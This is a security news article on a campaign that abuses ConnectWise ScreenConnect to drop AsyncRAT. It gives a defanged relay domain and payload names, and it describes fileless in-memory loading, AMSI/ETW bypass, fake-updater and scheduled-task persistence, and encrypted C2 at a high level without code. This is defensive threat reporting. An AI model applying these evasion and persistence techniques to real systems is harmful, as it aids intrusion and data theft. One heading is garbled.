Attackers Abuse ConnectWise ScreenConnect to Drop AsyncRAT

A recent threat campaign has exposed a critical vulnerability in the widely used remote desktop and remote support software, ConnectWise ScreenConnect. Attackers have successfully exploited this weakness to deploy the AsyncRAT malware, compromising numerous endpoints and putting sensitive data at risk.

Exploiting the Weakness

The attack began with a compromised ScreenConnect client, which provided an entry point for the attackers to initiate an interactive session through a malicious domain (relay.shipperzone[.]online). This malicious domain was linked to unauthorized ScreenConnect deployments, allowing the threat actors to execute PowerShell commands that fetched two payloads from a remote server.

The payloads, logs.ldk and logs.ldr, were stored in the public folder and executed directly in memory using reflection. The attackers used a classic fileless malware trick to evade detection and defense by decoding and running .NET assemblies directly in memory instead of saving executables to disk.

The AsyncRAT Infection Chain

Once the payloads were executed, the Obfuscator.dll stage of the infection chain launched execution, setting up persistence via a fake Skype Updater. This allowed the malware to disable defenses like AMSI and ETW, ensuring its ability to persist on the compromised system.

The AsyncRAT malware includes three core classes for initialization, dynamic payload loading, and anti-analysis tactics, making it difficult to detect and analyze. The malware's primary function is served by the AsyncClient.exe engine, which decrypts config with AES-256, connects to C2 servers, and parses commands via a custom protocol.

Key Features of AsyncRAT

The AsyncRAT attack chain features several key components:

  • Obfuscator.dll: The first in-memory stage of the infection chain, launching execution and setting up persistence via a fake Skype Updater.
  • AsyncClient.exe: The core C2 engine, decrypting config with AES-256, connecting to C2 servers, and parsing commands via a custom protocol.
  • Keylogger and exfiltration tools: Used to monitor user activity and gather sensitive data like browser extensions.

Persistent Persistenceh3>

The malware maintains persistence via scheduled tasks using the CreateLoginTask() function, seen in Obfuscator.dll or redundantly recreated from AsyncClient. This ensures that even if the system reboots, the malware remains active and continues to execute its payload.

A Warning for IT Professionals

LevelBlue researchers warn of a growing threat campaign abusing ConnectWise ScreenConnect to deploy AsyncRAT. The attack highlights the importance of staying vigilant and up-to-date with security patches and best practices to prevent such vulnerabilities from being exploited in the future.

As one researcher noted, "Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution." This approach bypasses traditional disk-based detection by operating in memory, making these threats harder to detect, analyze, and eradicate. It is essential for IT professionals, MSPs, and businesses to be aware of this threat and take proactive measures to secure their systems.

Stay informed about the latest security threats and developments by following us on Twitter (@securityaffairs), Facebook, and Mastodon.